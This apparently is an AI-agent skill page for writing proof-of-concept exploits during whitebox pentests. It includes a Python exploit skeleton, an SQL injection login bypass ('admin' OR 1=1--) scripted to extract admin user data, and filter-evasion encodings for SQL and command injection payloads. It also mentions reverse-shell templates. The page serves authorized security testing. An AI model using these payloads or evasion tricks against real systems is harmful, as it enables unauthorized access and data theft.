This skill should be used when the user asks to "write an exploit", "create PoC", "develop proof of concept", "exploit script", "automate exploitation", "build exploit", or needs guidance on developing working exploits during whitebox pentesting.
From vuln-scoutnpx claudepluginhub allsmog/vuln-scout --plugin vuln-scoutThis skill uses the workspace's default tool permissions.
examples/cmdi-template.pyexamples/deser-template.pyexamples/sqli-template.pyDesigns and optimizes AI agent action spaces, tool definitions, observation formats, error recovery, and context for higher task completion rates.
Enables AI agents to execute x402 payments with per-task budgets, spending controls, and non-custodial wallets via MCP tools. Use when agents pay for APIs, services, or other agents.
Compares coding agents like Claude Code and Aider on custom YAML-defined codebase tasks using git worktrees, measuring pass rate, cost, time, and consistency.
Guide the development of Proof of Concept (PoC) exploits to demonstrate confirmed vulnerabilities. This is Phase 3 of the whitebox pentesting process.
Activate this skill when:
Choose exploit language based on target:
| Scenario | Recommended Language |
|---|---|
| Web application (server-side) | Python |
| Client-side attack (browser) | JavaScript |
| Mixed (client + server chain) | Python + JavaScript |
| Binary exploitation | Python (pwntools) |
| Windows target | Python or PowerShell |
| Linux target | Python or Bash |
| Reusing application logic | Same as application |
#!/usr/bin/env python3
"""
Exploit: [Application Name] [Vulnerability Type]
Author: [Your Name]
Date: [Date]
CVE: [If applicable]
Description:
[Brief description of the vulnerability]
Usage:
python3 exploit.py <target_url>
"""
import requests
import sys
import argparse
class Exploit:
def __init__(self, target):
self.target = target.rstrip('/')
self.session = requests.Session()
def check_vulnerable(self):
"""Verify target is vulnerable"""
# Implementation
pass
def exploit(self):
"""Execute the exploit"""
# Implementation
pass
def cleanup(self):
"""Remove any artifacts"""
# Implementation
pass
def main():
parser = argparse.ArgumentParser(description='Exploit description')
parser.add_argument('target', help='Target URL')
parser.add_argument('--check', action='store_true', help='Check only')
args = parser.parse_args()
exploit = Exploit(args.target)
if args.check:
if exploit.check_vulnerable():
print("[+] Target is vulnerable")
else:
print("[-] Target is not vulnerable")
return
try:
exploit.exploit()
finally:
exploit.cleanup()
if __name__ == '__main__':
main()
import requests
# Basic GET
response = requests.get(f"{target}/path", params={"key": "value"})
# POST with data
response = requests.post(f"{target}/path", data={"key": "value"})
# POST with JSON
response = requests.post(f"{target}/path", json={"key": "value"})
# With headers
headers = {"Authorization": "Bearer token", "X-Custom": "value"}
response = requests.get(f"{target}/path", headers=headers)
# With cookies
cookies = {"session": "abc123"}
response = requests.get(f"{target}/path", cookies=cookies)
# Session persistence
session = requests.Session()
session.post(f"{target}/login", data={"user": "admin", "pass": "pass"})
session.get(f"{target}/admin") # Session cookies maintained
Before automating, document each manual step:
1. Send request to /login with username=admin' OR 1=1--
2. Extract session token from response cookie
3. Access /admin/users with session token
4. Extract user data from response
Translate manual steps to code:
def exploit(self):
# Step 1: SQL Injection for auth bypass
login_data = {"username": "admin' OR 1=1--", "password": "x"}
resp = self.session.post(f"{self.target}/login", data=login_data)
if "Welcome" not in resp.text:
print("[-] Authentication bypass failed")
return False
# Step 2: Access admin panel
resp = self.session.get(f"{self.target}/admin/users")
# Step 3: Extract data
users = self.parse_users(resp.text)
return users
def exploit(self):
try:
resp = self.session.post(f"{self.target}/login", data=payload, timeout=10)
resp.raise_for_status()
except requests.exceptions.Timeout:
print("[-] Request timed out")
return False
except requests.exceptions.RequestException as e:
print(f"[-] Request failed: {e}")
return False
def check_vulnerable(self):
"""Non-destructive vulnerability check"""
test_payload = "admin' AND '1'='1"
resp = self.session.post(f"{self.target}/login",
data={"username": test_payload, "password": "x"})
# Check for SQL error or successful bypass
indicators = ["SQL syntax", "mysql_fetch", "Welcome admin"]
return any(ind in resp.text for ind in indicators)
def cleanup(self):
"""Remove artifacts created during exploitation"""
# Delete uploaded files
# Restore modified data
# Remove created accounts
pass
# URL encoding
payload = urllib.parse.quote(payload)
# Double URL encoding
payload = urllib.parse.quote(urllib.parse.quote(payload))
# Unicode encoding
payload = payload.encode('unicode_escape').decode()
# Case variation
payload = ''.join(c.upper() if i % 2 else c.lower() for i, c in enumerate(payload))
# Space alternatives
payload = payload.replace(' ', '/**/') # SQL
payload = payload.replace(' ', '${IFS}') # Command injection
# Quote alternatives
payload = payload.replace("'", "\\x27")
payload = payload.replace('"', '\\x22')
def print_success(self, message):
print(f"\033[92m[+]\033[0m {message}")
def print_error(self, message):
print(f"\033[91m[-]\033[0m {message}")
def print_info(self, message):
print(f"\033[94m[*]\033[0m {message}")
def generate_report(self):
return {
"target": self.target,
"vulnerability": "SQL Injection",
"endpoint": "/login",
"parameter": "username",
"payload": self.payload,
"impact": "Authentication Bypass",
"exploited": True,
"data_extracted": self.extracted_data
}
Working exploit templates in examples/:
sqli-template.py - SQL injection exploit with union/blind detectioncmdi-template.py - Command injection with OS detection and reverse shelldeser-template.py - Deserialization exploits (Python, PHP, Java formats)